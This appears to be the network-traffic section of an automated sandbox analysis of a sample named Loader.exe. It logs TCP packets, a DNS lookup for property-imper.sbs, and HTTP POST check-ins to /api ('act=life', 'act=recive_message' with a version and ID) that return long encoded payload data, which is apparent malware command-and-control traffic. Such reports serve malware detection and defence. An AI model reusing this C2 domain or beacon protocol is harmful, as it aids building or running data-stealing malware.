                                                                                            Nov 23, 2024 09:49:02.464242935 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:02.464252949 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:02.464492083 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:02.465936899 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:02.466011047 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:02.466036081 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189440966 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189486980 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189515114 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189536095 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.189544916 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189557076 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189591885 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.189650059 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.189703941 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.189727068 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.205094099 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.205171108 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.205188990 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.213459015 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.213519096 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.213532925 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.262742043 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.398958921 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.402884960 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.402939081 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.402972937 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.402993917 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.403058052 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.403143883 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.403172970 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.403199911 CET49731443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.403213024 CET44349731172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.510045052 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.510143042 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:03.510234118 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.510540962 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:03.510577917 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:04.724203110 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:04.724286079 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:04.738908052 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:04.738957882 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:04.739270926 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:04.749830961 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:04.750080109 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:04.750123978 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:04.750232935 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:04.750248909 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:06.748483896 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:06.748594046 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:06.748698950 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:06.748867035 CET49732443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:06.748908043 CET44349732172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:06.877975941 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:06.878021955 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:06.878092051 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:06.878365993 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:06.878381014 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.091797113 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.091903925 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:08.092998028 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:08.093004942 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.093313932 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.094475985 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:08.094614983 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:08.094639063 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.818675041 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.818768024 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:08.818811893 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:08.818927050 CET49733443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:08.818939924 CET44349733172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:09.031749964 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:09.031841993 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:09.032071114 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:09.032320976 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:09.032360077 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:10.297256947 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:10.297377110 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:10.298587084 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:10.298629999 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:10.299706936 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:10.300817013 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:10.300949097 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:10.301002026 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:10.301105022 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:10.301120996 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:11.185909986 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:11.186192036 CET44349734172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:11.186208963 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:11.186278105 CET49734443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:11.801774025 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:11.801830053 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:11.801898956 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:11.802568913 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:11.802583933 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.021672964 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.021780014 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:13.023073912 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:13.023088932 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.023761034 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.027091026 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:13.027190924 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:13.027196884 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.724226952 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.724333048 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:13.724380016 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:13.724431038 CET49735443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:13.724453926 CET44349735172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:14.557854891 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:14.557945013 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:14.558090925 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:14.558568001 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:14.558602095 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.864759922 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.864845037 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.866041899 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.866070032 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.866405964 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.877861023 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.878740072 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.878787041 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.878915071 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.878963947 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.879117966 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.879152060 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.879434109 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.879484892 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.880036116 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.880104065 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.880430937 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.880470991 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.880496025 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.880522966 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.880675077 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.880716085 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.880769968 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.880872011 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.880935907 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.923362970 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.923593998 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.923666954 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.923726082 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:15.971357107 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:15.971448898 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:16.019365072 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:18.069598913 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:18.069842100 CET44349736172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:18.069854975 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:18.069919109 CET49736443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:18.106555939 CET49739443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:18.106601954 CET44349739172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:18.106692076 CET49739443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:18.106944084 CET49739443192.168.2.4172.67.162.84
                                                                                            Nov 23, 2024 09:49:18.106955051 CET44349739172.67.162.84192.168.2.4
                                                                                            Nov 23, 2024 09:49:18.622597933 CET49739443192.168.2.4172.67.162.84
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 23, 2024 09:48:58.676820040 CET5206753192.168.2.41.1.1.1
                                                                                            Nov 23, 2024 09:48:59.146656036 CET53520671.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 23, 2024 09:48:58.676820040 CET192.168.2.41.1.1.10x43f9Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 23, 2024 09:48:59.146656036 CET1.1.1.1192.168.2.40x43f9No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                            Nov 23, 2024 09:48:59.146656036 CET1.1.1.1192.168.2.40x43f9No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                            • property-imper.sbs
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449730172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:00 UTC265OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2024-11-23 08:49:01 UTC1019INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=3nntl9apo0fa24b5kgsee8361t; expires=Wed, 19-Mar-2025 02:35:39 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2BvSCrRO5NiA1V4pBcJ3qcZhhpWC2N0VGGhItIA8l%2FYibBYi0UUDt34AUoqIFzVHUeCE3lYytm1r4ASkhE1%2BsTHasmPi4duVA%2Bqmlj0AkxK52Zck0wD%2B%2FJEvIACWEMYzJFb89q8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe74b5c138c2d-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1817&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1549893&cwnd=247&unsent_bytes=0&cid=52dc06d7375201e7&ts=698&x=0"
                                                                                            2024-11-23 08:49:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2024-11-23 08:49:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449731172.67.162.844433864C:\Users\user\Desktop\Loader.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-23 08:49:02 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 52
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-23 08:49:02 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6524795094&j=
                                                                                            2024-11-23 08:49:03 UTC1009INHTTP/1.1 200 OK
                                                                                            Date: Sat, 23 Nov 2024 08:49:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=l18o1uv4igmkp8hjgtu75jp3bl; expires=Wed, 19-Mar-2025 02:35:41 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqMgBv3dSQAMubiT9YAEILRJxAbu9dokcuEuqeqduxTOrZ6KESLG9HiXvAkaH1fGs9niw24MG7P7Wb%2BGzFSIHDwVRVza1BWgVEe47gFkLAOx65R6i2OmfiyaoRZah055HCpbOgc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e6fe7582edb426a-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1720&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=1723730&cwnd=223&unsent_bytes=0&cid=8950dd2534571623&ts=731&x=0"
                                                                                            2024-11-23 08:49:03 UTC360INData Raw: 34 64 37 0d 0a 6d 66 51 71 67 69 6c 37 6c 51 32 66 53 54 6f 69 2b 69 63 4e 74 32 51 43 67 68 77 33 62 66 44 74 6a 6f 49 2b 43 68 65 53 69 63 4c 69 31 6c 79 67 45 30 2b 35 4c 2b 77 73 47 42 69 4f 56 58 6a 53 53 43 44 6a 65 42 56 58 6c 6f 7a 69 38 56 73 6d 4e 65 54 6b 34 4b 4f 53 53 2b 35 61 48 72 6b 76 2b 6a 45 59 47 4b 46 63 4c 39 49 4b 49 4c 67 2b 55 67 65 53 6a 4f 4c 67 58 32 46 34 34 75 57 68 38 5a 68 4e 36 6b 77 59 38 57 7a 7a 4a 46 39 48 6e 30 5a 6e 32 51 31 76 36 6e 45 56 51 64 4b 49 39 4b 41 45 4b 46 72 33 2f 61 50 55 6c 56 6e 70 43 77 61 35 64 72 30 73 56 41 44 41 42 57 7a 53 42 6d 37 6b 65 46 77 46 6d 49 58 71 34 56 70 67 5a 2f 76 76 71 76 47 57 54 75 74 47 45 65 56 68 2b 53 4e 55 51 5a 56 47 4c 35 74 47 5a 2f 67 2b 44 55 2f 42 76 65 2f 78 54 58
                                                                                            Data Ascii: 4d7mfQqgil7lQ2fSToi+icNt2QCghw3bfDtjoI+CheSicLi1lygE0+5L+wsGBiOVXjSSCDjeBVXlozi8VsmNeTk4KOSS+5aHrkv+jEYGKFcL9IKILg+UgeSjOLgX2F44uWh8ZhN6kwY8WzzJF9Hn0Zn2Q1v6nEVQdKI9KAEKFr3/aPUlVnpCwa5dr0sVADABWzSBm7keFwFmIXq4VpgZ/vvqvGWTutGEeVh+SNUQZVGL5tGZ/g+DU/Bve/xTX
                                                                                            2024-11-23 08:49:03 UTC886INData Raw: 54 52 59 70 4f 5a 74 67 4c 59 4f 31 30 57 67 79 53 69 4f 62 71 55 32 4a 78 2f 65 61 6d 2b 35 59 49 72 67 73 65 37 79 2b 6c 61 33 74 46 69 45 4a 6a 77 30 52 61 6f 47 45 62 46 74 4b 49 34 4b 41 45 4b 48 33 31 36 4b 50 77 6d 55 76 6f 51 41 76 33 66 66 73 6d 58 56 4b 65 51 47 48 66 42 58 4c 71 63 46 4d 4d 6d 34 54 6c 35 56 74 73 4e 62 36 72 70 2b 50 57 45 4b 42 71 46 50 78 6a 39 7a 78 59 41 49 63 4c 64 70 55 42 62 4b 41 6d 46 51 75 54 69 2b 33 6b 55 6d 5a 78 2f 4f 32 75 39 70 6c 4f 36 6b 73 65 2f 57 66 31 4b 6c 56 4c 6c 30 56 71 32 41 4a 6d 37 48 39 51 54 39 7a 50 36 2f 67 63 4d 44 58 65 37 4b 50 70 31 48 33 6a 52 52 66 77 65 62 30 30 46 6c 6e 59 51 6d 4f 56 58 69 44 75 65 31 6f 64 6b 35 33 70 37 6b 35 6b 63 50 62 6d 6f 2f 57 57 54 65 64 47 46 2f 46 6f 2f 69
                                                                                            Data Ascii: TRYpOZtgLYO10WgySiObqU2Jx/eam+5YIrgse7y+la3tFiEJjw0RaoGEbFtKI4KAEKH316KPwmUvoQAv3ffsmXVKeQGHfBXLqcFMMm4Tl5VtsNb6rp+PWEKBqFPxj9zxYAIcLdpUBbKAmFQuTi+3kUmZx/O2u9plO6kse/Wf1KlVLl0Vq2AJm7H9QT9zP6/gcMDXe7KPp1H3jRRfweb00FlnYQmOVXiDue1odk53p7k5kcPbmo/WWTedGF/Fo/i
                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 33 66 39 35 0d 0a 63 53 2b 52 50 46 50 68 6d 39 43 4a 4b 53 70 52 4c 66 64 67 4d 5a 65 35 79 55 41 43 53 6a 75 33 75 56 6d 4d 31 76 71 75 6e 34 39 59 51 6f 47 51 55 35 33 33 33 49 45 6b 43 72 55 5a 68 32 77 46 32 6f 47 45 62 46 74 4b 49 34 4b 41 45 4b 48 37 32 35 36 7a 37 6b 46 72 75 52 41 76 39 66 66 6b 6c 58 45 79 57 54 47 4c 61 41 33 4c 6b 66 6b 63 4f 6c 34 6a 69 37 55 35 74 4e 62 36 72 70 2b 50 57 45 4b 42 78 4c 66 42 2f 37 43 77 61 64 5a 74 4c 59 64 49 51 49 50 38 77 54 45 2b 56 67 36 79 34 48 47 74 35 2f 65 4b 6c 39 49 52 43 37 45 6f 4c 38 47 62 30 49 56 6c 4f 6c 30 35 6a 30 42 52 72 37 33 5a 61 44 70 2b 43 35 2b 52 63 4b 44 75 77 37 4c 69 37 7a 67 6a 42 52 68 62 6c 62 4f 78 70 62 55 4f 57 53 32 6a 44 52 6e 2b 75 5a 78 55 49 6e 73 2b 30 6f 46 31 6b
                                                                                            Data Ascii: 3f95cS+RPFPhm9CJKSpRLfdgMZe5yUACSju3uVmM1vqun49YQoGQU5333IEkCrUZh2wF2oGEbFtKI4KAEKH7256z7kFruRAv9ffklXEyWTGLaA3LkfkcOl4ji7U5tNb6rp+PWEKBxLfB/7CwadZtLYdIQIP8wTE+Vg6y4HGt5/eKl9IRC7EoL8Gb0IVlOl05j0BRr73ZaDp+C5+RcKDuw7Li7zgjBRhblbOxpbUOWS2jDRn+uZxUIns+0oF1k
                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 37 33 6e 55 2f 72 51 42 33 7a 62 2f 41 67 56 6b 36 52 53 57 66 5a 41 58 4c 74 65 31 30 46 6d 34 72 67 37 56 39 36 64 76 47 72 37 72 75 52 55 4b 41 54 57 64 42 63 79 67 67 59 58 39 5a 63 4c 39 49 4b 49 4c 67 2b 56 41 65 56 67 65 6a 79 55 6e 70 37 39 2b 75 6d 38 35 35 50 37 45 55 58 35 57 66 38 4b 31 5a 50 6b 45 78 72 31 41 4a 6b 37 48 6b 56 51 64 4b 49 39 4b 41 45 4b 46 33 7a 38 62 71 35 75 45 50 67 54 41 6e 68 64 4c 30 30 46 6c 6e 59 51 6d 4f 56 58 69 44 6b 64 56 38 47 6b 59 62 6f 37 56 78 68 65 76 6e 6a 72 66 4f 45 53 65 70 5a 48 66 4a 75 38 69 46 63 53 4a 52 4b 59 39 45 55 61 36 41 77 46 51 69 4b 7a 37 53 67 66 47 4e 6a 30 2f 6d 79 75 34 6b 47 2b 51 73 65 2b 79 2b 6c 61 31 46 4d 6d 55 52 6c 30 77 31 6c 37 58 35 51 42 5a 57 44 37 4f 42 66 62 6e 50 39 34
                                                                                            Data Ascii: 73nU/rQB3zb/AgVk6RSWfZAXLte10Fm4rg7V96dvGr7ruRUKATWdBcyggYX9ZcL9IKILg+VAeVgejyUnp79+um855P7EUX5Wf8K1ZPkExr1AJk7HkVQdKI9KAEKF3z8bq5uEPgTAnhdL00FlnYQmOVXiDkdV8GkYbo7VxhevnjrfOESepZHfJu8iFcSJRKY9EUa6AwFQiKz7SgfGNj0/myu4kG+Qse+y+la1FMmURl0w1l7X5QBZWD7OBfbnP94
                                                                                            2024-11-23 08:49:03 UTC1369INData Raw: 41 34 45 51 63 2f 32 54 37 4a 56 6c 47 6c 45 67 76 6d 30 5a 6e 2b 44 34 4e 54 37 57 56 34 65 5a 4c 65 55 44 33 36 2f 47 37 69 51 62 35 43 78 37 37 4c 36 56 72 56 55 79 53 53 47 72 52 44 6d 66 6a 66 31 6b 4c 6e 34 4c 6f 36 56 68 74 5a 2b 4c 74 72 76 75 5a 52 75 39 48 43 2f 6c 71 2f 53 63 59 44 74 68 43 64 35 56 65 49 4e 46 70 56 55 2b 4e 77 66 57 67 57 32 51 31 71 4b 75 76 39 6f 52 45 37 30 73 59 39 47 76 32 4c 46 35 47 6d 55 5a 71 31 67 4e 6d 34 58 35 5a 42 5a 57 48 35 75 35 52 62 6e 48 32 37 65 43 31 31 6b 2f 34 43 30 47 33 58 66 41 6c 55 55 4f 65 53 48 6e 39 4e 79 44 2f 4d 45 78 50 6c 59 4f 73 75 42 78 73 66 76 6a 6e 70 66 4f 54 53 65 68 42 45 66 68 67 37 79 70 58 53 5a 39 4f 59 74 6f 49 5a 65 35 73 55 67 53 5a 68 2b 58 75 57 69 67 37 73 4f 79 34 75 38
                                                                                            Data Ascii: A4EQc/2T7JVlGlEgvm0Zn+D4NT7WV4eZLeUD36/G7iQb5Cx77L6VrVUySSGrRDmfjf1kLn4Lo6VhtZ+LtrvuZRu9HC/lq/ScYDthCd5VeINFpVU+NwfWgW2Q1qKuv9oRE70sY9Gv2LF5GmUZq1gNm4X5ZBZWH5u5RbnH27eC11k/4C0G3XfAlUUOeSHn9NyD/MExPlYOsuBxsfvjnpfOTSehBEfhg7ypXSZ9OYtoIZe5sUgSZh+XuWig7sOy4u8
